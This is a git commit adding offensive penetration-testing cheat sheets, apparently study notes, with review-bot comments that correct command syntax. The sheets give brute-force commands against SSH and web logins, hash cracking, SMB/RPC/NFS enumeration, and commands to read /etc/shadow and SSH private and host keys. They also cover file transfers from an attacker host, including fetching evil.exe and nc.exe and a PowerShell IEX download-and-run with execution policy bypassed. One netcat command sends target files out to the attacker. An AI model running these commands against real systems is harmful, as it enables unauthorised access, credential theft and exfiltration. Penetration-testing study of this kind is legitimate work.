1 parent
0fddd71
commit 4a20193
Showing
14 changed files
with
1,034 additions
and
0 deletions.
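--- /dev/null
+++ b/path-not-shown-1
@@ -0,0 +1,55 @@
+
+Cewl
+cewl http://<targetip>/ -m 6 -w cewl.txt
+wc -l cewl.txt
+john --wordlist=cewl.txt --rules --stdout > mutated.txt
+wc mutated.txt
+medusa -h <targetip> -u admin -P mutated.txt -M http -n 80 -m DIR:/directory/to/login/panel -T 30
+
+-----------------------------------
+
+Hydra
+
+hydra -l root -P /usr/share/wordlısts/rockyou.txt <targetip> ssh
+hydra -L userlist.txt -P /usr/share/wordlısts/rockyou.txt <targetip> -s 22 ssh -V
+
+# crack web passwords
+http-post-form can change as user module changes
+Invalid: what message does the page give for wrong creds
+for parameters check with burp
+
+hydra -l admin -P /usr/share/seclists/Passwords/10k_most_common.txt <targetip> http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid" -t 64
+
+-----------------------------------
+
+Medusa
+medusa -h <targetip> -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/test -T 10
+
+-----------------------------------
+
+Hashcat
+
+# learn the hash type from hashcat.net example hashes page and pass as its m value
+# or you can learn with the following command
+hashcat -h | grep -i lm
+hashcat -m 1600 hashes /usr/share/wordlists/rockyou.txt
+
+-----------------------------------
+
+LM/NTLM
+hashcat -h | grep -i lm
+hashcat -m 3000 hashes --rules --wordlist=/usr/share/wordlists/rockyou.txt
+
+https://hashkiller.co.uk/
+
+------------------------------------------
+
+When you find some digits, check if it's 32 bit
+echo -n ....... | wc -c
+
+------------------------------------------
+John
+john hashes.txt --rules --wordlist=/usr/share/wordlists/rockyou.txt
+
+
+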
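Review bot: The two lines under `Hydra` spell the wordlist directory as `wordlısts` with a dotless ı (U+0131) instead of an ASCII i, so the path will not resolve; the `Medusa`, `Hashcat` and `John` lines further down spell it `wordlists` and are the model. The `LM/NTLM` invocation `hashcat -m 3000 hashes --rules --wordlist=...` carries John's flags into hashcat, which takes the wordlist as a positional argument and rules via `-r`, exactly as the `hashcat -m 1600 hashes /usr/share/wordlists/rockyou.txt` line above it does. The comment `check if it's 32 bit` above `echo -n ....... | wc -c` describes a byte count, so `32 characters` would say what the command actually measures.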
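--- /dev/null
+++ b/path-not-shown-2
@@ -0,0 +1,110 @@
+NMAP
+
+# Alive hosts
+nmap -sn 10.0.0.0/24
+
+# scan the 1024 most common ports, run OS detection, run default nmap scripts
+nmap -A -oA nmap <targetip>
+
+# Scan more deeply, scan all 65535 ports on $targetip with a full connect scan
+nmap -v -sT <targetip> -p-
+
+# more options
+nmap -sV -sC -v -A <targetip> -p-
+nmap -sT -sV -A -O -v -p 1–65535 <targetip>
+
+# my preference
+nmap -sV -sC -v -oA output <targetip>
+nmap -p- -v <targetip>
+
+
+------------------------
+
+SMB
+
+Port 139 and 445- SMB/Samba shares
+Samba is a service that enables the user to share files with other machines
+works the same as a command line FTP client, may browse files without even having credentials
+
+# Share List:
+smbclient --list <targetip>
+smbclient -L <targetip>
+
+# Check SMB vulnerabilities:
+nmap --script=smb-check-vulns.nse <targetip> -p445
+
+# basic nmap scripts to enumerate shares and OS discovery
+nmap -p 139,445 192.168.1.1/24 --script smb-enum-shares.nse smb-os-discovery.nse
+
+# Connect using Username
+root@kali:~# smbclient -L <targetip> -U username -p 445
+
+# Connect to Shares
+smbclient \\\\<targetip>\\ShareName
+smbclient \\\\<targetip>\\ShareName -U john
+
+# enumarete with smb-shares, -a “do everything” option
+enum4linux -a 192.168.1.120
+
+# learn the machine name and then enumerate with smbclient
+nmblookup -A 192.168.1.102
+smbclient -L <server_name> -I 192.168.1.105
+
+# rpcclient - Connect with a null-session (only works for older windows servers)
+rpcclient -U james 10.10.10.52
+rpcclient -U "" 192.168.1.105
+(press enter if asks for a password)
+rpcclient $> srvinfo
+rpcclient $> enumdomusers
+rpcclient $> enumalsgroups domain
+rpcclient $> lookupnames administrators
+rpcclient> querydominfo
+rpcclient> enumdomusers
+rpcclient> queryuser john
+
+# scan for vulnerabilities with nmap
+nmap --script "vuln" <targetip> -p139,445
+
+------------------------
+
+SMTP
+
+# telnet or netcat connection
+nc <targetip> 25
+VRFY root
+# Check for commands
+nmap -script smtp-commands.nse <targetip>
+
+------------------------
+
+Port 111 - RPC
+
+Rpcbind can help us look for NFS-shares. So look out for nfs. Obtain list of services running with RPC:
+
+rpcbind -p <targetip>
+rpcinfo –p x.x.x.x
+
+# using nmap, see which port NFS is listening
+locate *rpc*.nse
+nmap --script rpcinfo.nse <targetip> -p 111
+
+-------------------------
+
+NFS
+
+# to find the public share
+locate *nfs*.nse
+nmap --script nfs-showmount.nse <targetip>
+
+# mount the share to a folder under /tmp
+mkdir /tmp/nfs
+/sbin/mount.nfs <targetip>:/home/box /tmp/nfs
+
+
+
+
+
+
+
+
+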
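Review bot: In `nmap -p 139,445 192.168.1.1/24 --script smb-enum-shares.nse smb-os-discovery.nse`, `--script` takes a single comma-separated argument, so the second script name is parsed as an additional target rather than a script; it should read `--script smb-enum-shares.nse,smb-os-discovery.nse`. Two flags use an en dash where an ASCII hyphen is needed, `-p 1–65535` under `# more options` and `rpcinfo –p x.x.x.x` under `Port 111 - RPC`, and both tools will reject them as written. `rpcbind -p <targetip>` names the portmapper daemon rather than a query tool; the `rpcinfo -p` line that follows is the one that lists registered services, so the `rpcbind` line should be dropped or commented as such. As far as I recall `smb-check-vulns.nse` was removed from Nmap's script set some releases ago in favour of the `smb-vuln-*` scripts, so the `# Check SMB vulnerabilities:` line deserves a comment saying it needs an old Nmap or the newer script names.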
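--- /dev/null
+++ b/path-not-shown-3
@@ -0,0 +1,6 @@
+Searchsploit
+# To view the file
+searchsploit -x php/webapps/41564.c
+
+# To see the full path of the file
+searchsploit -p php/webapps/41564.c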
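--- /dev/null
+++ b/path-not-shown-4
@@ -0,0 +1,58 @@
+Python SimpleHTTPServer
+
+#on Attacker
+python -m SimpleHTTPServer
+
+#on target
+wget <attackerip>:8000/filename
+
+
+------------------------------
+
+Apache
+
+#on Attacker
+cp filetosend.txt /var/www/html
+service apache2 start
+
+#on target
+wget http://attackerip/file
+curl http://attackerip/file > file
+fetch http://attackerip/file # on BSD
+
+----------------------------------
+
+Netcat (From Target to Kali)
+
+# Listen on Kali
+nc -lvp 4444 > file
+
+# Send from Target machine
+nc <kali_ip> 4444 < file
+
+-----------------
+
+
+Netcat (From Kali to Target)
+
+# on target, wait for the file
+nc -nvlp 55555 > file
+
+# on kali, push the file
+nc $victimip 55555 < file
+
+
+----------------------
+
+Extra:
+To send the executable file to your machine:
+
+base64 executable
+# copy the output
+# paste it in a file called file.txt
+# decode it and create the executable
+base64 -d file.txt > executable
+
+
+
+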
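Review bot: `python -m SimpleHTTPServer` under `#on Attacker` is the Python 2 module; on a Python 3 interpreter the equivalent is `python3 -m http.server`, and since `python` now commonly resolves to Python 3 the line should carry that alternative or at least a `# Python 2 only` comment. The `Extra:` base64 round-trip has no integrity check, so a truncated paste is only discovered when the decoded file misbehaves; running `sha256sum` on the original and on the decoded result and comparing the digests catches that early. `curl http://attackerip/file > file` would read more consistently as `curl -o file http://attackerip/file`, mirroring the `wget` form directly above it.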
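--- /dev/null
+++ b/path-not-shown-5
@@ -0,0 +1,71 @@
+
+--------------------------------------
+TFTP
+# Windows XP and Win 2003 contain tftp client. Windows 7 do not by default
+# tfpt clients are usually non-interactive, so they could work through an obtained shell
+
+atftpd --daemon --port 69 /tftp
+Windows> tftp -i 192.168.30.45 GET nc.exe
+
+--------------------------------------
+
+FTP (pyftpdlib client on Kali)
+# Ftp is generally installed on Windows machines
+# To make it interactive, use -s option
+
+# On Kali install a ftp client and set a username/password
+apt-get install python-pyftpdlib
+python -m pyftpdlib -p 21
+
+# on Windows
+ftp <attackerip>
+> binary
+> get exploit.exe
+
+-------------------------------------------
+
+FTP (pureftpd client on Kali)
+
+# on Kali
+
+# install ftp client
+apt-get install pure-ftpd
+# create a group
+groupadd ftpgroup
+# add a user
+useradd -g ftpgroup -d /dev/null -s /etc ftpuser
+# Create a directory for your ftp-files (you can also specify a specific user e.g.: /root/ftphome/bob).
+mkdir /root/ftphome
+# Create a ftp-user, in our example "bob" (again you can set "-d /root/ftphome/bob/" if you wish).
+pure-pw useradd bob -u ftpuser -g ftpgroup -d /root/ftphome/
+# Update the ftp database after adding our new user.
+pure-pw mkdb
+# change ownership of the specified ftp directory (and all it's sub-direcotries)
+chown -R ftpuser:ftpgroup /root/ftphome
+# restart Pure-FTPD
+/etc/init.d/pure-ftpd restart
+
+
+# On Windows
+echo open <attackerip> 21> ftp.txt
+echo USER username password >> ftp.txt
+echo bin >> ftp.txt
+echo GET evil.exe >> ftp.txt
+echo bye >> ftp.txt
+ftp -s:ftp.txt
+
+--------------------------------------
+
+Powershell
+echo $storageDir = $pwd > wget.ps1
+echo $webclient = New-Object System.Net.WebClient >>wget.ps1
+echo $url = "http://<attackerip>/powerup.ps1" >>wget.ps1
+echo $file = "powerup.ps1" >>wget.ps1
+echo $webclient.DownloadFile($url,$file) >>wget.ps1
+powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
+
+--------------------------------------
+# Powershell download a file
+powershell "IEX(New Object Net.WebClient).downloadString('http://<targetip>/file.ps1')"
+
+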
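Review bot: The last command, `powershell "IEX(New Object Net.WebClient)..."`, is missing the hyphen in `New-Object` and will not parse, and it fetches from `<targetip>` while every other download in this file names the serving host `<attackerip>`; the `$webclient = New-Object System.Net.WebClient` line above has the spelling to follow. In `echo open <attackerip> 21> ftp.txt`, cmd.exe treats the digit immediately before `>` as a file-handle number, so the script ends up containing `open <attackerip> 2`; a space before the redirect, `echo open <attackerip> 21 > ftp.txt`, avoids that. The headings `FTP (pyftpdlib client on Kali)` and `FTP (pureftpd client on Kali)` and the comment `# install ftp client` describe what `python -m pyftpdlib -p 21` and `pure-ftpd` actually start, which is a server, so `server` would be the accurate word. `# tfpt clients` is a typo for `tftp`.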
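--- /dev/null
+++ b/path-not-shown-6
@@ -0,0 +1,72 @@
+
+# priv esc enumeration scripts
+https://github.com/rebootuser/LinEnum
+https://github.com/reider-roque/linpostexp/blob/master/linprivchecker.py
+http://pentestmonkey.net/tools/audit/unix-privesc-check
+
+# Kernel and OS
+uname -a
+uname -mrs
+cat /etc/issue
+cat /etc/lsb-release # Debian based
+cat /etc/redhat-release # Redhat based
+
+# running services and find services run boy root
+ps aux
+ps aux | grep root
+
+# which applications are installed
+dpkg -l
+ls -alh /usr/bin/
+ls -alh /sbin/
+
+# scheduled tasks
+crontab -l
+
+# port forwarding
+ssh -L 8080:127.0.0.1:80 root@192.168.1.7 # Local Port
+ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # Remote Port
+
+# tunneling
+ssh -D 127.0.0.1:9050 -N [username]@[ip]
+proxychains ifconfig
+
+# sensitive files
+cat /etc/passwd
+cat /etc/group
+cat /etc/shadow
+ls -alh /var/mail/
+
+# check home dirs
+ls -ahlR /root/
+ls -ahlR /home
+
+# private key search
+cat ~/.ssh/authorized_keys
+cat ~/.ssh/identity.pub
+cat ~/.ssh/identity
+cat ~/.ssh/id_rsa.pub
+cat ~/.ssh/id_rsa
+cat ~/.ssh/id_dsa.pub
+cat ~/.ssh/id_dsa
+cat /etc/ssh/ssh_config
+cat /etc/ssh/sshd_config
+cat /etc/ssh/ssh_host_dsa_key.pub
+cat /etc/ssh/ssh_host_dsa_key
+cat /etc/ssh/ssh_host_rsa_key.pub
+cat /etc/ssh/ssh_host_rsa_key
+cat /etc/ssh/ssh_host_key.pub
+cat /etc/ssh/ssh_host_key
+
+
+# Sticky Bits & SUID & GUID
+
+find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
+find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it.
+find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it.
+find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID
+
+
+
+
+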
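Review bot: `find / -perm -g=s -o -perm -u=s -type f 2>/dev/null` does not match its `# SGID or SUID` comment: find's implicit `-a` binds tighter than `-o`, so the expression is `-perm -g=s` OR (`-perm -u=s` AND `-type f`) and SGID directories are reported alongside files; grouping fixes it, `find / -type f \( -perm -g=s -o -perm -u=s \) 2>/dev/null`. The heading `# Sticky Bits & SUID & GUID` should say `SGID`, which is the bit the `-perm -g=s` lines below it search for. The comment `# running services and find services run boy root` has a typo for `by`.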